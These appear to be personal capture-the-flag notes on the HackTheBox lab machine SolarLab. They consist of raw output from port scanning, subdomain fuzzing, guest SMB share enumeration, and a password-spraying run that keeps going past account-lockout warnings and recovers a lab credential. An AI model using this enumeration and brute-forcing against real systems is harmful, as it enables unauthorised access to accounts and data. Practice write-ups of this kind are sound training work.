HACKTHEBOX - SOLARLAB
Nmap scan
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.24.0
|_http-title: SolarLab Instant Messenger
|_http-server-header: nginx/1.24.0
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds?
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2024-07-23T14:47:55
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
wfuzz -c -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ.solalab.htb" -u http://solarlab.htb -t 100 --hw 11
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://solarlab.htb/
Total requests: 19966
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 15.15260
Processed Requests: 19966
Filtered Requests: 19966
Requests/sec.: 1317.660
crackmapexec smb 10.10.11.16 -u 'Guest' -p '' --shares
SMB 10.10.11.16 445 SOLARLAB [*] Windows 10.0 Build 19041 x64 (name:SOLARLAB) (domain:solarlab) (signing:False) (SMBv1:False)
SMB 10.10.11.16 445 SOLARLAB [+] solarlab\Guest:
SMB 10.10.11.16 445 SOLARLAB [*] Enumerated shares
SMB 10.10.11.16 445 SOLARLAB Share Permissions Remark
SMB 10.10.11.16 445 SOLARLAB ----- ----------- ------
SMB 10.10.11.16 445 SOLARLAB ADMIN$ Remote Admin
SMB 10.10.11.16 445 SOLARLAB C$ Default share
SMB 10.10.11.16 445 SOLARLAB Documents READ
SMB 10.10.11.16 445 SOLARLAB IPC$ READ Remote IPC
cd SOLARLAB/
victorhin0@victorhin0-KLVL-WXX9:~/HTB/SOLARLAB$ smbclient --user=Guest //10.10.11.16/Documents -d 2
rlimit_max: increasing rlimit_max (1024) to minimum Windows limit (16384)
added interface wlp1s0 ip=192.168.1.17 bcast=192.168.1.255 netmask=255.255.255.0
Password for [WORKGROUP\Guest]:
Cannot do GSE to an IP address
Try "help" to get a list of possible commands.
smb: \> dir
. DR 0 Fri Apr 26 16:47:14 2024
.. DR 0 Fri Apr 26 16:47:14 2024
concepts D 0 Fri Apr 26 16:41:57 2024
desktop.ini AHS 278 Fri Nov 17 11:54:43 2023
details-file.xlsx A 12793 Fri Nov 17 13:27:21 2023
My Music DHSrn 0 Thu Nov 16 20:36:51 2023
My Pictures DHSrn 0 Thu Nov 16 20:36:51 2023
My Videos DHSrn 0 Thu Nov 16 20:36:51 2023
old_leave_request_form.docx A 37194 Fri Nov 17 11:35:57 2023
7779839 blocks of size 4096. 1890566 blocks available
smb: \>
Started at: 05:31 PM CEST on July 23, 2024
Target: 10.10.11.16
Target count: 1
Username count: 2
Password count: 12
Estimated attempts: 24
User-as-Pass Mode: False
Honey Badger Mode: False
Verbose Mode: False
[-] Account Locked Out on 10.10.11.16: ./openfire:Pine Tree
[!] Honey Badger mode not enabled. Halting to prevent further lockouts..
[!] Would you like to proceed with the bruteforce? (Y/N) y
[*] Resuming...
[-] Account Locked Out on 10.10.11.16: ./openfire:Blue
[!] Honey Badger mode not enabled. Halting to prevent further lockouts..
[!] Would you like to proceed with the bruteforce? (Y/N) y
[*] Resuming...
[+] Success (Account Active) on 10.10.11.16: ./blake:ThisCanB3typedeasily1@
ClaudiaS is in reporthub